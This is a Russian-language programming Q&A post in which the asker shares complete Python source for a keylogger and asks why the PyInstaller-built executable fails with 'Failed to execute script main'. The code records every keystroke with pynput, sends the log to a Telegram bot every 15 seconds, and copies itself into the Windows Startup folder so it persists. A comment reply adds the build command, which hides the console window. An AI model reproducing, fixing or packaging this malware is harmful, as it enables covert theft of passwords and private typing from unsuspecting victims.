# Ошибка pyinstaller "Failed to execute script main"

Tags: python

Написал такой скрипт, всё работает отлично. Но как только конвертируешь в .exe с помощью pyinstaller выдаёт ошибку которая указана в заголовке. Перерыл весь интернет, так и не нашёл решение. Пробовал всё: от переустановки pyinstaller до полной перезаписи и проверки кода. Код:

```
import pynput
import threading
import telebot
import os
import shutil
import subprocess
import re


class Keylogger:
    def __init__(self):
        self.log = 'Прослушка начата...'
        self.interval = 15
        self.token = 'Токен'
        self.chat_id = чат-айди
        self.bot = telebot.TeleBot(self.token)

    def append_to_log(self, string):
        self.log += string

    def process_key_press(self, key):
        global log
        try:
            current_key = str(key.char)
        except AttributeError:
            if key == key.space:
                current_key = ' '
            else:
                current_key = ' ' + str(key) + ' '
        self.append_to_log(current_key)

    def report(self):
        if self.log != '':
            self.bot.send_message(self.chat_id, self.log)
        self.log = ''
        timer = threading.Timer(self.interval, self.report)
        timer.start()

    def start(self):
        keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
        with keyboard_listener:
            self.report()
            keyboard_listener.join()


class Autoload:
    def __init__(self):
        self.user = os.getlogin()
        self.path_src = os.getcwd() + '\main.exe'
        self.path_dst = 'C:\\Users\\' + self.user + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\main.exe'
        if os.path.exists(self.path_dst) == False:
            shutil.copyfile(self.path_src, self.path_dst, follow_symlinks=True)
        my_keylogger = Keylogger()
        my_keylogger.start()


auto = Autoload()
```

Повторюсь, код рабочий на все сто процентов. Токен и чат-айди скрыл по понятным причинам. Буду рад любым предложениям.

Comment: добавьте в вопрос команду, которой собираете `.exe`, пожалуйста

Comment: pyinstaller --onefile --noconsole /путь/к/файлу. Всегда так собирал. Пробовал собирать другие свои программы, ошибок при запуске не возникает.